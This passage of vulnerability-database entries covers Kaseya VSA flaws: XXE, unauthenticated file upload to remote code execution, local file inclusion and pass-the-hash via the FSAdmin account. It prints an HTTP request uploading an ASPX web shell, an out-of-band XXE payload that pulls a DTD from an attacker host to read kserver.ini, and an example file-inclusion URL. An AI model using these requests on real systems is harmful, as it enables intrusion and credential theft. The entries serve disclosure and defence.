respuesta de error demasiado verbosa Impacto --- Usando esta vulnerabilidad un atacante puede leer cualquier archivo en el servidor que el proceso del servidor web pueda leer. 
Adem\u00e1s, puede ser utilizado para realizar solicitudes HTTP(s) en la red local y as\u00ed utilizar el sistema Kaseya para pivotar en la red local"
    }
  ],
  "id": "CVE-2021-30201",
  "lastModified": "2024-11-21T06:03:30.653",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "cve@mitre.org",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-07-09T14:15:07.957",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/CVE-2021-30201"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/DIVD-2021-00011"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/CVE-2021-30201"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/DIVD-2021-00011"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-611"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

FKIE_CVE-2021-30118

Vulnerability from fkie_nvd - Published: 2021-07-09 14:15 - Updated: 2024-11-21 06:03
Summary
An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System.Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System.Collections" %> <script runat="server"> private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. 
Security issues discovered
---
* A sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication.
* /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access.
* The web server process has write access to the webroot, where the attacker can execute the uploaded file by requesting the URL of the newly created file.

Impact
---
This arbitrary file upload allows an attacker to place files of his own choosing at any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code), he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise.
Impacted products
Vendor Product Version
kaseya vsa *

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*",
              "matchCriteriaId": "081A5508-D14F-4622-B1F4-87761173D935",
              "versionEndExcluding": "9.5.5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring \u0026 Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx\u0026PathData=C%3A%5CKaseya%5CWebPages%5C\u0026__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219\u0026qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 \u003c%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %\u003e \u003c%@ Import namespace=\"System.Web.UI.WebControls\" %\u003e \u003c%@ Import namespace=\"System.Diagnostics\" %\u003e \u003c%@ Import namespace=\"System.IO\" %\u003e \u003c%@ Import namespace=\"System\" %\u003e \u003c%@ Import namespace=\"System.Data\" %\u003e \u003c%@ Import namespace=\"System.Data.SqlClient\" %\u003e \u003c%@ Import namespace=\"System.Security.AccessControl\" %\u003e \u003c%@ Import namespace=\"System.Security.Principal\" %\u003e \u003c%@ Import namespace=\"System.Collections.Generic\" %\u003e \u003c%@ Import namespace=\"System.Collections\" %\u003e \u003cscript runat=\"server\"\u003e private const string password = \"pass\"; // The password ( pass ) private const string style = \"dark\"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); \u003csnip\u003e ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. 
Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise."
    },
    {
      "lang": "es",
      "value": "Un atacante puede cargar archivos con el privilegio del proceso del Servidor Web para el Monitoreo y Gesti\u00f3n Remota Unificada (RMM) de Kaseya VSA 9.5.4.2149 y posteriormente utilizar estos archivos para ejecutar comandos asp La api /SystemTab/uploader.aspx es vulnerable a una carga de archivos arbitraria no autenticada que conduce a RCE. Un atacante puede cargar archivos con el privilegio del proceso del Servidor Web y posteriormente utilizar estos archivos para ejecutar comandos asp. Descripci\u00f3n detallada --- Dada la siguiente petici\u00f3n: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx\u0026amp;PathData=C%3A%5CKaseya%5CWebPages%5C\u0026amp;__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219\u0026amp;qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1. 194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 \u0026lt;%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %\u0026gt; \u0026lt;%@ Import namespace=\"System. Web.UI.WebControls\" %\u0026gt; \u0026lt;%@ Import namespace=\"System.Diagnostics\" %\u0026gt; \u0026lt;%@ Import namespace=\"System.IO\" %\u0026gt; \u0026lt;%@ Import namespace=\"System\" %\u0026gt; \u0026lt;%@ Import namespace=\"System.Data\" %\u0026gt; \u0026lt;%@ Import namespace=\"System. Data.SqlClient\" %\u0026gt; \u0026lt;%@ Import namespace=\"System.Security.AccessControl\" %\u0026gt; \u0026lt;%@ Import namespace=\"System.Security.Principal\" %\u0026gt; \u0026lt;%@ Import namespace=\"System.Collections.Generic\" %\u0026gt; \u0026lt;%@ Import namespace=\"System. Collections\" %\u0026gt; "
    }
  ],
  "id": "CVE-2021-30118",
  "lastModified": "2024-11-21T06:03:20.430",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 10.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "cve@mitre.org",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-07-09T14:15:07.847",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/CVE-2021-30118"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/DIVD-2021-00011"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/CVE-2021-30118"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/DIVD-2021-00011"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes",
        "Vendor Advisory"
      ],
      "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-434"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

FKIE_CVE-2021-30121

Vulnerability from fkie_nvd - Published: 2021-07-09 14:15 - Updated: 2024-11-21 06:03
Summary
Semi-authenticated local file inclusion: the contents of arbitrary files can be returned by the webserver. Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\Kaseya\WebPages\dl.asp`. A valid sessionId is required but can be easily obtained via CVE-2021-30118.
Impacted products
Vendor Product Version
kaseya vsa *

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*",
              "matchCriteriaId": "3A890109-5AD9-4684-A46D-A80D6A5F1834",
              "versionEndExcluding": "9.5.6",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Semi-authenticated local file inclusion The contents of arbitrary files can be returned by the webserver Example request: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\\Kaseya\\WebPages\\dl.asp` A valid sessionId is required but can be easily obtained via CVE-2021-30118"
    },
    {
      "lang": "es",
      "value": "Inclusi\u00f3n de archivos locales semiautenticados El contenido de archivos arbitrarios puede ser devuelto por el servidor web Ejemplo de solicitud: `https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\\Kaseya\\WebPages\\dl.asp` Se requiere un SessionId v\u00e1lido pero puede ser f\u00e1cilmente obtenido a trav\u00e9s de CVE-2021-30118"
    }
  ],
  "id": "CVE-2021-30121",
  "lastModified": "2024-11-21T06:03:20.880",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "NONE",
          "baseScore": 4.0,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "cve@mitre.org",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-07-09T14:15:07.930",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/CVE-2021-30121"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/DIVD-2021-00011"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/CVE-2021-30121"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://csirt.divd.nl/DIVD-2021-00011"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-829"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

FKIE_CVE-2019-14510

Vulnerability from fkie_nvd - Published: 2019-10-11 12:15 - Updated: 2024-11-21 04:26
Summary
An issue was discovered in Kaseya VSA RMM through 9.5.0.22. When using the default configuration, the LAN Cache feature creates a local account FSAdminxxxxxxxxx (e.g., FSAdmin123456789) on the server that hosts the LAN Cache and all clients that are assigned to a LAN Cache. This account is placed into the local Administrators group of all clients assigned to the LAN Cache. When the assigned client is a Domain Controller, the FSAdminxxxxxxxxx account is created as a domain account and automatically added as a member of the domain BUILTIN\Administrators group. Using the well known Pass-the-Hash techniques, an attacker can use the same FSAdminxxxxxxxxx hash from any LAN Cache client and pass this to a Domain Controller, providing administrative rights to the attacker on any Domain Controller. (Local account Pass-the-Hash mitigations do not protect domain accounts.)
Impacted products
Vendor Product Version
kaseya vsa *

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:kaseya:vsa:*:*:*:*:rmm:*:*:*",
              "matchCriteriaId": "6409EECE-A626-4D65-ABFD-B05DC5CB8218",
              "versionEndIncluding": "9.5.0.22",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in Kaseya VSA RMM through 9.5.0.22. When using the default configuration, the LAN Cache feature creates a local account FSAdminxxxxxxxxx (e.g., FSAdmin123456789) on the server that hosts the LAN Cache and all clients that are assigned to a LAN Cache. This account is placed into the local Administrators group of all clients assigned to the LAN Cache. When the assigned client is a Domain Controller, the FSAdminxxxxxxxxx account is created as a domain account and automatically added as a member of the domain BUILTIN\\Administrators group. Using the well known Pass-the-Hash techniques, an attacker can use the same FSAdminxxxxxxxxx hash from any LAN Cache client and pass this to a Domain Controller, providing administrative rights to the attacker on any Domain Controller. (Local account Pass-the-Hash mitigations do not protect domain accounts.)"
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 un problema en Kaseya VSA RMM versiones hasta 9.5.0.22. Cuando es usada la configuraci\u00f3n predeterminada, la funcionalidad LAN Cache crea una cuenta local FSAdminxxxxxxxxx (por ejemplo, FSAdmin123456789) en el servidor que aloja la LAN Cache y todos los clientes asignados a una LAN Cache. Esta cuenta es colocada en el grupo de administradores locales de todos los clientes asignados a la LAN Cache. Cuando el cliente asignado es un Controlador de Dominio, la cuenta FSAdminxxxxxxxxx es creada como una cuenta de dominio y agregada autom\u00e1ticamente como miembro del grupo BUILTIN\\Administrators del dominio. Utilizando las conocidas t\u00e9cnicas Pass-the-Hash, un atacante puede usar el mismo hash de FSAdminxxxxxxxxx desde cualquier cliente de LAN Cache y pasarlo hacia un Controlador de Dominio, proporcionando derechos administrativos al atacante en cualquier Controlador de Dominio. (Las mitigaciones Pass-the-Hash de la cuenta local no protegen cuentas de dominio)."
    }
  ],
  "id": "CVE-2019-14510",
  "lastModified": "2024-11-21T04:26:52.353",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "LOCAL",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 7.2,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 6.7,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 0.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2019-10-11T12:15:11.050",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Release Notes"
      ],
      "url": "http://community.kaseya.com/xsp/f/355.aspx"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Release Notes"
      ],
      "url": "http://community.kaseya.com/xsp/f/355/t/24675.aspx"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Product"
      ],
      "url": "https://www.kaseya.com/products/vsa/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes"
      ],
      "url": "http://community.kaseya.com/xsp/f/355.aspx"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Release Notes"
      ],
      "url": "http://community.kaseya.com/xsp/f/355/t/24675.aspx"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://lockstepgroup.com/blog/abusing-the-kaseya-lan-cache-fsadmin/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://lockstepgroup.com/blog/cve-2019-14510-abusing-the-kaseya-lan-cache-fsadmin-red-team-edition/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Product"
      ],
      "url": "https://www.kaseya.com/products/vsa/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-276"
        },
        {
          "lang": "en",
          "value": "CWE-287"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

CVE-2021-30201 (GCVE-0-2021-30201)

Vulnerability from cvelistv5 – Published: 2021-07-09 13:25 – Updated: 2024-08-03 22:24
Summary
The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---&gt; There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. 
# Place it in the same directory as the KServer executable
# A blank line or new valid section header [] terminates each section.
# Comment lines start with ; or #
########################################################################
<snip>
```

Security issues discovered
---
* The API insecurely resolves external XML entities.
* The API has an overly verbose error response.

Impact
---
Using this vulnerability, an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.
CWE
  • n/a
Assigner
Credits
Discovered by Wietse Boonstra of DIVD Additional research by Frank Breedijk of DIVD

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T22:24:59.560Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/DIVD-2021-00011"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://csirt.divd.nl/CVE-2021-30201"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
